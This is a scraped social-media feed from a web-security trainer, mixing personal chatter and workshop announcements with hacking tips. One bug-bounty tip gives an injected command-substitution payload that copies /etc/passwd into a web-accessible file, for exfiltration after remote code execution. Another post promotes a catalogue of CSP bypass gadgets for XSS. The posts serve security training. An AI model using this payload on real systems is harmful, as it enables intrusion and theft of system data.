@buildhacksecure.bsky.social
Fullstack dev & Hacker, training ethical hackers how to hack & web devs to secure their apps! CTO at https://hackinghub.io and Director at https://bsidesexeter.co.uk
Haha, love the fact we got to see your whole thought process haha, nice work :)
04.02.2025 07:18 β π 1 π 0 π¬ 0 π 0
Secure Coding Challengeβ¦
What is insecure about this code? And how would you extract a file? For example /etc/passwd
If it doesn't work, it's always DNS you know. I created a challenge around this nightmare that will be kindly hosted by @hackinghub.bsky.social starting today at 18:00 UTC. Thanks @buildhacksecure.bsky.social for the kind hospitality.
15.01.2025 17:56 β π 1 π 1 π¬ 0 π 0So say we have the webroot:
/var/www/you-cant-guess/
And a file located here: /var/www/you-cant-guess/assets/uniquefile.png
The above command becomes:
cat /etc/passwd > /var/www/you-cant-guess/assets/uniquefile.png.txt
Got an RCE in a background process with no outbound network so you need to exfil to webroot without knowing the location?
All you need to know is a uniue filename in the webroot.
$( cat /etc/passwd > $(find / -name uniquefile.png 2>/dev/null).txt )
#bugbountytips #hacking
Merry Christmas!
25.12.2024 07:36 β π 1 π 0 π¬ 0 π 0
I don't know how I feel about AI. As a dev for 20+ yrs, I love coding, creating, solving puzzles. AI saves time & makes sense for business, but is it sucking the joy out of it? Are we all just becoming prompt engineers? Maybe I'm just an old man shouting at clouds...
20.12.2024 12:16 β π 0 π 0 π¬ 0 π 0Thank you mate, I try :)
10.12.2024 21:18 β π 0 π 0 π¬ 0 π 0Adam has the rare ability to turn seemingly simple situations into opportunities for reflection or learning.
10.12.2024 19:37 β π 1 π 1 π¬ 1 π 0I once did one side of a cube, that's the furthest I've got haha
10.12.2024 07:40 β π 1 π 0 π¬ 0 π 0Okay, I have a toxic CTF challenge idea.... Should I do it? Operation "Merry ToxMas"
09.12.2024 10:21 β π 2 π 0 π¬ 1 π 02 Hours in and weirdly not tired. Just covered our SQL Injection module.
04.12.2024 00:01 β π 0 π 0 π¬ 0 π 0
Hosting a workshop with @nahamsec.bsky.social remotely in Aus from 10pm to 1:30am for YowConf! Come on coffee!!!
04.12.2024 00:00 β π 1 π 1 π¬ 0 π 1π
23.11.2024 21:53 β π 0 π 0 π¬ 0 π 0Oh yeah, totally all downhill from here.
22.11.2024 16:44 β π 0 π 0 π¬ 1 π 0Ah Happy Birthday dude, welcome to the 40 club!
22.11.2024 16:10 β π 1 π 0 π¬ 1 π 0Yeah I totally agree, it feels so much calmer here.
20.11.2024 19:14 β π 0 π 0 π¬ 1 π 0Ah nice, you too buddy :)
17.11.2024 22:33 β π 0 π 0 π¬ 0 π 0Hey BlueSky!
I case you missed it:
I've created cspbypass.com
A site where you can search for known CSP bypass gadgets to gain XSS.
It already contains a bunch of useful gadgets with contributions from your favourite hackers.
If you have some CSP bypasses to share, feel free to contribute!
I'm delivering a talk about web app security ( or the lack of it ) in web apps and also delivering a workshop in Melbourne, Brisbane and Sydney at the start of Decemeber! See yowcon.com for more detail.
15.11.2024 16:33 β π 4 π 0 π¬ 0 π 0Can't work out whether you're giving a talk or belting out a song :)
14.11.2024 09:09 β π 1 π 0 π¬ 0 π 0Hoping I prefer this platform a little more :) Give us a follow if you're into web app security or web development #webdev #hacking #ethicalhacker #php
14.11.2024 09:07 β π 7 π 2 π¬ 0 π 0
